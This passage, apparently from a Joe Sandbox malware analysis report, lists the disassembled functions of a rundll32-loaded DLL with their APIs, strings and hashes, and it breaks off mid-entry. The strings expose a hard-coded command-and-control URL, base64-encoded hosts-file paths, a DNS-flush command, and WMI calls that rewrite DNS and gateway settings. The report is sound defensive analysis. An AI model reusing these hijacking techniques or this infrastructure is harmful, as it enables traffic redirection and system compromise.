                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ddf20059e84ffb7fff87fd904b7c3f6a6708f804268ef9e84ddf2eafb0653b56
                                                                                                                                      • Instruction ID: 990b4b590539f5031fcd26483d3a67aef074ad6bc671c07e013d47c43f96bcab
                                                                                                                                      • Opcode Fuzzy Hash: ddf20059e84ffb7fff87fd904b7c3f6a6708f804268ef9e84ddf2eafb0653b56
                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 1000B224 Relevance: 1.6, Strings: 1, Instructions: 400COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: K
                                                                                                                                      • API String ID: 0-856455061
                                                                                                                                      • Opcode ID: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
                                                                                                                                      • Instruction ID: 6c5504f13a17a8b4553fb93f6e314e3eb43bbcef24ba1366296fc093faca9512
                                                                                                                                      • Opcode Fuzzy Hash: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
                                                                                                                                      • Instruction Fuzzy Hash: 13D1F2311046896EDB21CFAC8C80EFFBBBCAF4AA40F840549FD85CB642D555E92DA771
                                                                                                                                      Function 1000AEC0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: K
                                                                                                                                      • API String ID: 0-856455061
                                                                                                                                      • Opcode ID: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
                                                                                                                                      • Instruction ID: a9c7f45465d92fcd6248bf8d3b75336943ce7982e690b294f387925eaf45448f
                                                                                                                                      • Opcode Fuzzy Hash: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
                                                                                                                                      • Instruction Fuzzy Hash: 6F9143311046896EDB21CFAD8C80EFFBBBCAF06A40F840549FE85C7642D255E92DA771
                                                                                                                                      Function 10003F41 Relevance: 1.5, APIs: 1, Instructions: 6filenetworkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                      • Opcode ID: 17794e789735475d89bbd1f9c593eb9d99e0ec2b66a06d8a24d179cffc3f724c
                                                                                                                                      • Instruction ID: 66c4406e5843dae4aa23aa47ff20fa86481cf42106c3819bfbf8a2f6b8e79ef1
                                                                                                                                      • Opcode Fuzzy Hash: 17794e789735475d89bbd1f9c593eb9d99e0ec2b66a06d8a24d179cffc3f724c
                                                                                                                                      • Instruction Fuzzy Hash: 20B00872519392ABDF02DF91CD4482ABAA6BB89301F084C5CF2A540071C7328428EB02
                                                                                                                                      Function 10003F63 Relevance: 1.5, APIs: 1, Instructions: 4shutdownCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ExitWindowsEx.USER32(000000BC,000000BC), ref: 10003F6B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1089080001-0
                                                                                                                                      • Opcode ID: ddd05c4d22fa51185853cbc8baa1bf28f6a18d545d76c7cc1a4f4cf3c1112b8e
                                                                                                                                      • Instruction ID: a0a7e03ceb7acd9bb0d3454ea8bb5ca0f40435505fc546ba40186378cb909d0a
                                                                                                                                      • Opcode Fuzzy Hash: ddd05c4d22fa51185853cbc8baa1bf28f6a18d545d76c7cc1a4f4cf3c1112b8e
                                                                                                                                      • Instruction Fuzzy Hash: 81A00175509222EBDE025B51CE4888ABEA6AB88381F008858F28940031C77284A2EB02
                                                                                                                                      Function 10003FB7 Relevance: 1.5, APIs: 1, Instructions: 4processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(?,?,10005931,00000002,00000000), ref: 10003FBF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3332741929-0
                                                                                                                                      • Opcode ID: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                      • Instruction ID: ca46abfd3f4ae67059df7024880e3d5c8c44562ed1dec37196b9e10746ab925e
                                                                                                                                      • Opcode Fuzzy Hash: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                      • Instruction Fuzzy Hash: D5A00136408212ABDA42AB50CD48D4AFFA2BBA8781F02C819F19980034CB32C5A5EB12
                                                                                                                                      Function 100121ED Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: '
                                                                                                                                      • API String ID: 0-1997036262
                                                                                                                                      • Opcode ID: c66cf635900fd9560f5d33fce30572d65f1195a3a7c35dcba06b6c48dfc04a12
                                                                                                                                      • Instruction ID: f389f15fd0a8877f73eb6a91fb6ffbaafb7a2d8a217a3cbe01a0a4cb358a3832
                                                                                                                                      • Opcode Fuzzy Hash: c66cf635900fd9560f5d33fce30572d65f1195a3a7c35dcba06b6c48dfc04a12
                                                                                                                                      • Instruction Fuzzy Hash: 5581276940E3D19FC7438B785CF91823FA2AE1B24434F09DAC4C09F4B7E1995D49C7A2
                                                                                                                                      Function 1000B70D Relevance: .1, Instructions: 104COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
                                                                                                                                      • Instruction ID: 9e0b5d620d62c11970e9cc848d1ca02f4ed839136e4bfa4bb83daef4b24ba54e
                                                                                                                                      • Opcode Fuzzy Hash: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
                                                                                                                                      • Instruction Fuzzy Hash: AA313A33E2C6B607E324DF7E4C84025F7D6EB8A06275A8779DE88E7255D128EC518BD0
                                                                                                                                      Function 1001C75E Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 00be98f971533dabdca0adb2b0bfe67ba6c18141ac78e74e5c08b48ce473a3bc
                                                                                                                                      • Instruction ID: 2e43e059b6811d7a826d4679207dd72d542f29227514ce03a7f13a12420a2fe7
                                                                                                                                      • Opcode Fuzzy Hash: 00be98f971533dabdca0adb2b0bfe67ba6c18141ac78e74e5c08b48ce473a3bc
                                                                                                                                      • Instruction Fuzzy Hash: D4E01AF001D206F9C613FF24488299DBEA6EF54320F114C1EB4D048A02E378E1A49A53
                                                                                                                                      Function 100053B7 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229sleepfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 10005437
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,10016AD0), ref: 1000537D
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?, ,?,10016AD0), ref: 1000538A
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,00000000,?, ,?,10016AD0), ref: 10005393
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,1001538C,?,00000000,?, ,?,10016AD0), ref: 100053A0
                                                                                                                                      • wsprintfA.USER32 ref: 1000549E
                                                                                                                                      • wsprintfA.USER32 ref: 100054BC
                                                                                                                                      • PrintFile.4HSURTWNWJ(?,?,75A38400,?,00000000), ref: 100054DE
                                                                                                                                      • rand.MSVCRT ref: 1000552A
                                                                                                                                      • rand.MSVCRT ref: 10005538
                                                                                                                                      • rand.MSVCRT ref: 10005543
                                                                                                                                      • rand.MSVCRT ref: 1000554E
                                                                                                                                      • rand.MSVCRT ref: 10005559
                                                                                                                                      • rand.MSVCRT ref: 10005564
                                                                                                                                      • wsprintfA.USER32 ref: 10005582
                                                                                                                                      • Sleep.KERNEL32(000003E8,00000000,?,?,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,00000009,00000000,75A38400), ref: 100055AE
                                                                                                                                      Strings
                                                                                                                                      • c:\windows\system32\drivers\%s, xrefs: 10005498
                                                                                                                                      • %s\%s, xrefs: 10005431
                                                                                                                                      • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
                                                                                                                                      • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
                                                                                                                                      • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                      • API String ID: 3997227624-455112146
                                                                                                                                      • Opcode ID: 00038874c8ac35a6ae1b60bac382e6ffef2455f26ac0b5aee4ca5ce9a6c88aa6
                                                                                                                                      • Instruction ID: 890992f53ccb8bcf3efa63f38db088aa64bba12002f314d7c4cebe62ca78ea42
                                                                                                                                      • Opcode Fuzzy Hash: 00038874c8ac35a6ae1b60bac382e6ffef2455f26ac0b5aee4ca5ce9a6c88aa6
                                                                                                                                      • Instruction Fuzzy Hash: CA611773A00258BFEB14DB64CC46FDE77ADEB84351F184466F6089B180DBB5FA848B60
                                                                                                                                      Function 1000720E Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 366COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007338
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 1000734D
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007368
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10007377
                                                                                                                                        • Part of subcall function 10007A62: VariantInit.OLEAUT32(?), ref: 10007AA1
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007505
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10007513
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                      • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
                                                                                                                                      • API String ID: 2640012081-1668994663
                                                                                                                                      • Opcode ID: 86e639d1799cf5c67544a657d22f8ae4b178d9a2e4eb471cf584f507669dd23e
                                                                                                                                      • Instruction ID: 774f900a019f83844f3bb95aad3f9d8ec9bae888818d20f4d4ee3eb9d32bfb7b
                                                                                                                                      • Opcode Fuzzy Hash: 86e639d1799cf5c67544a657d22f8ae4b178d9a2e4eb471cf584f507669dd23e
                                                                                                                                      • Instruction Fuzzy Hash: 52D18F70D00219EFEB15CFA4C8809EEBBB8FF49780F104419F419AB255DB75AA45CFA1
                                                                                                                                      Function 10006EDE Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 174sleeplibraryfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 10006F24
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 10006F8B
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,00000000,XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==,00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 10006FA2
                                                                                                                                      • Sleep.KERNEL32 ref: 10007059
                                                                                                                                      • wsprintfA.USER32 ref: 1000709D
                                                                                                                                      • PrintFile.4HSURTWNWJ(00000000,?,00000000), ref: 100070D6
                                                                                                                                      • PrintFile.4HSURTWNWJ(00000000,?,00000000,?,00000000), ref: 100070E9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInitializePrintSleepThunk$wsprintf
                                                                                                                                      • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.236:18963/main.php$iOffset
                                                                                                                                      • API String ID: 983772623-225904188
                                                                                                                                      • Opcode ID: cc88521ed6d5d260813b9f4f205076b0dda962502f18a0edca253145bac44edc
                                                                                                                                      • Instruction ID: 7c4733b2b25a4913de381e4f7388076186c29a0bebbbdc1df1b0301bf662e4ca
                                                                                                                                      • Opcode Fuzzy Hash: cc88521ed6d5d260813b9f4f205076b0dda962502f18a0edca253145bac44edc
                                                                                                                                      • Instruction Fuzzy Hash: 6151D9B6D04359A6F722D764CC56FCF77ACEB083C1F1045A5F208E6086DB79AB808E55
                                                                                                                                      Function 10004D36 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 302COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004EC5
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004ECB
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004ED1
                                                                                                                                      • VariantInit.OLEAUT32(?,?,?,?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 10005009
                                                                                                                                      • VariantInit.OLEAUT32(?,?,?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000500F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                      • API String ID: 1927566239-2685825574
                                                                                                                                      • Opcode ID: 755400ef9f5a302fc9c7fa6a74ec9a7d080b6a6ee052c7b36293419411c16ba5
                                                                                                                                      • Instruction ID: 8c544d8820f47f8c2d588d66ad59eabb0b2f9e9606fb3a9374643a4bafb8e659
                                                                                                                                      • Opcode Fuzzy Hash: 755400ef9f5a302fc9c7fa6a74ec9a7d080b6a6ee052c7b36293419411c16ba5
                                                                                                                                      • Instruction Fuzzy Hash: DFA17EB1900209AFEB04DFA4CC81DEEBBB8FF48390F104569F515AB284DB31AE45CB60
                                                                                                                                      Function 1000826C Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145librarysleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 100082D7
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==,00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 100082EE
                                                                                                                                      • Sleep.KERNEL32(?,00000000,00000000), ref: 10008394
                                                                                                                                      • wsprintfA.USER32 ref: 100083E6
                                                                                                                                      Strings
                                                                                                                                      • 127.0.0.1, xrefs: 100083F4
                                                                                                                                      • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008405
                                                                                                                                      • http://107.163.56.236:18963/main.php, xrefs: 10008353
                                                                                                                                      • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082DC
                                                                                                                                      • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082C5
                                                                                                                                      • 8.8.8.8, xrefs: 100083EF
                                                                                                                                      Memory Dump Source
